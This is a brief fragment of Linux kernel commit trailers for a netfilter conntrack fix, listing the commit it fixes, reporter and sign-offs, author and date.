Fixes: f330a7fdbe16 ("netfilter: conntrack: get rid of conntrack timer")
Reported-by: Fabian Frederick
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso

Florian Westphal
2016-09-25 20:54:08 +0800